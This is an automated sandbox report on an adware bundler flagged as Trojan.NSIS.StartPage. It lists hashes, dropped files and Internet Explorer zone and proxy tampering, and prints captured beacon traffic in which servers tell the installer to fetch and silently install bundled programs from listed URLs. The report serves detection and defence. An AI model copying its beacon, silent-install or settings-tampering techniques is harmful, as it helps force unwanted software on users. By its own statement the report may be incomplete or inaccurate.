Trojan.NSIS.StartPage_2c328ed34b

by malwarelabrobot on November 25th, 2015 in Malware Descriptions.

not-a-virus:AdWare.Win32.OutBrowse.bzb (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 2c328ed34b295e5905a9684374cf95dd
SHA1: 924a68fcdfea14a664a20eb7a5aeddd4853d0e87
SHA256: f2999d031e3dca3fe8b3f2ccc2d8e296dd840555ed9bc91c69b77d44694fb7a8
SSDeep: 98304:EwIjOp0hKqLhn6O8hp w1djHxhKnL4qUUql3Oxl1VBImEQ/2c39Ol6MYKA/BKede:EwU0HDjKEhml1VBIQ Qwl6MYKA/Bzde
Size: 6337148 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2007-04-19 03:08:20
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

setup.exe:880
%original file name%.exe:188

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.exe:880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\DSS_Unq_IMapplication_mon_remote_dcmd[1].htm (620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\SecondResult.txt (620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_htiw_qinu[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsDialogs.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040920140410 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040920140410\index.dat (0 bytes)

The process %original file name%.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\dotn1ba3.rra (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DigiAqua_7598[1].exe (66929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\DIFx1bd2.rra (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\isrt1c10.rra (7316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\difx1c5f.rra (10582 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.ini (498 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\setup.ini (498 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Delta Tail Betta Wallpaper\UninstallDeltaTailBetta.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\setu1b74.rra (7348 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setu294f.rra (4984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\Stri1bd2.rra (791 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\layout.bin (437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\defa1c20.rra (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\Font1bc2.rra (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\_Setup.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\data1.hdr (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\_Setup.dll (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\_IsR1c3f.rra (4314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\core1ba3.rra (2334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\data1.cab (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\ISSetup.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.exe (12536 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\DigiAqua_7598[1].exe (0 bytes)

Registry activity

The process setup.exe:880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015112420151125]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015112420151125\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015112420151125]
"CachePrefix" = ":2015112420151125:"
"CacheRepair" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015112420151125]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF FC DF B1 80 F8 81 0A C7 8C 9C B4 FB 04 5E A6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015112420151125]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014040920140410]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 A9 C4 7D 44 44 46 BC 91 CD C6 A1 1F 96 8F 27"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
5264f7d6d89d1dc04955cfb391798446 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\GetVersion.dll
b140459077c7c39be4bef249c2f84535 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\Math.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\System.dll
7579ade7ae1747a31960a228ce02e666 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\UserInfo.dll
5afd4a9b7e69e7c6e312b2ce4040394a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\blowfish.dll
94ba775c8a1f4d6c9bb1966eddce22b5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\manlib.dll
fe3f848e2a306d586ab8f5433738d8db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\nsCBHTML5.dll
c10e04dd4ad4277d5adc951bb331c777 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\nsDialogs.dll
5f13dbc378792f23e598079fc1e4422b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\nsisunz.dll
2b7007ed0262ca02ef69d8990815cbeb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\registry.dll
febff2c363c7f7664687eefe8253087e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\serlib.dll
d061c9eea5e041658028c32aa739984f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\setup.exe
69348c7c4260e37c1c72edf236995be1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\dotnetinstaller.exe
898515a4ae2fb9d74ae2a905cf82b074 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\_IsRes.dll
1bd976dd77b31fe0f25708ad5c1351ae c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\difxapi.dll
77a3125a2059f39a9bef961953a8db8d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\isrt.dll
6c48e05107eb494620ab0dc96d3c5b80 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\ISSetup.dll
6fd5033f836dbc81fda60620d9c0ba52 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\_Setup.dll
6f58a1d8e7b031c6f2a60ba04d1a0b7d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.exe
6fd5033f836dbc81fda60620d9c0ba52 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\_Setup.dll
d061c9eea5e041658028c32aa739984f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DigiAqua_7598[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Macrovision Corporation
Product Name: InstallShield
Product Version: 14.0
Legal Copyright: Copyright (C) 2007 Macrovision Corporation
Legal Trademarks:
Original Filename: Setup.exe
Internal Name: Setup
File Version: 14.0.162
File Description: Setup.exe
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 293442 294912 4.56241 246bc04c9934d94ae3e5085c0fbab939
.rdata 299008 39536 40960 3.16332 16f2af57c4910be773837ffdb7fbde59
.data 339968 29740 24576 2.27004 ed1e754e7b6303e212e660e942089261
.rsrc 372736 7000 8192 4.25048 1fc89bcfdfcdf5c08b6e2805b4bd1040

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 70

URLs

URL IP
hxxp://cds.u6k4e8n6.hwcdn.net/DigiAqua_7598.exe
hxxp://23.22.255.164/download.php?ln6GeA==
hxxp://fcesneim.us/FCL_htiw_qinu.php
hxxp://stsunsetwest.com/DSS_Unq_IMapplication_mon_remote_dcmd.php
hxxp://cds.u6k4e8n6.hwcdn.net/os/rm/OfferScreen_12_HD.zip
hxxp://cds.u6k4e8n6.hwcdn.net/os/rm/OfferScreen_422.zip
hxxp://secured.cdnpmmm.us/DigiAqua_7598.exe 69.16.175.42
hxxp://www.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote_dcmd.php 50.97.62.154
hxxp://www.fcesneim.us/FCL_htiw_qinu.php 50.19.102.217
hxxp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip 69.16.175.42
hxxp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip 69.16.175.42
hxxp://www.comar13west.com/download.php?ln6GeA==


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Installshield One Click Install User-Agent Toys File
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE W32/InstallMonetizer.Adware Beacon 2

Traffic

POST /DSS_Unq_IMapplication_mon_remote_dcmd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache

from=nsis&type=Reg&mode=checker&utid=37.57.16.189_2015-11-23_23:57:47&pubid=11660&CbId=7598&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mun81YJHk71SsLj1y8vIIG48&DB=IE&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/419~NO~4/422~YES~0/430~NO~15/460~YES~0/575~NO~4/576~NO~4/689~YES~0/
HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 620
Connection: close
Content-Type: text/html; charset=UTF-8
422~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip~hXXp://VVV.dja
pp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#
12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudf
ront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.s
ystweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0..422#RE3|mysta
rtsearchSoftware\mystartsearchhp#RCMD|-pub_id=314 -adv_id=76#SLP|30^6#
PKG|NO#INT|Mntz_Installer.exe..12#RE2|Systweak\RegClean Pro\Version 6.
1#RCMD|/verysilent#SLP|10^3#FNV|WriteINI^hXXps://d24u51ac8ybaqu.cloudf
ront.net/inst/setup_38a77a.exe#PKG|NO#INT|rcpsetup_17970.exe..


GET /os/rm/OfferScreen_422.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.cdnpmmm.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:49 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426709167"
Last-Modified: Wed, 18 Mar 2015 20:06:07 GMT
Cache-Control: max-age=53850
Content-Length: 7218
Content-Type: application/octet-stream
X-HW: 1448341070.dop007.fr7.t,1448341069.cds026.fr7.c

<<< skipped >>>

GET /os/rm/OfferScreen_12_HD.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.cdnpmmm.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:49 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411022125"
Last-Modified: Thu, 18 Sep 2014 06:35:25 GMT
Cache-Control: max-age=53813
Content-Length: 10048
Content-Type: application/octet-stream
X-HW: 1448341070.dop008.fr7.t,1448341069.cds002.fr7.c

<<< skipped >>>

POST /FCL_htiw_qinu.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.fcesneim.us
Content-Length: 106
Connection: Keep-Alive
Cache-Control: no-cache

from=nsis&type=Reg&pubid=11660&CbId=7598&BundleVersionID=IM_240914@01&mid=qGKynuZ0mun81YJHk71SsLj1y8vIIG48
HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.14
Content-Length: 1943
Connection: close
Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote_dcmd.php.
.hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php..UA..hXXp://www
.stsunsetwest.com/DS_AdvAffiliateId.php..37.57.16.189_2015-11-23_23:57
:47..NULL..12#RE2|Systweak\RegClean Pro\Version 6.1..419#O|V^0*S^0*E^0
*EV1^0*T^0,B1|C*F*I,F1|Mail.Ru\MailRuUpdater.exe,F1|Amigo\Application\
amigo.exe,RE2|Amigo,RR2|IM^330,RE3|Clients\StartMenuInternet\amigo.exe
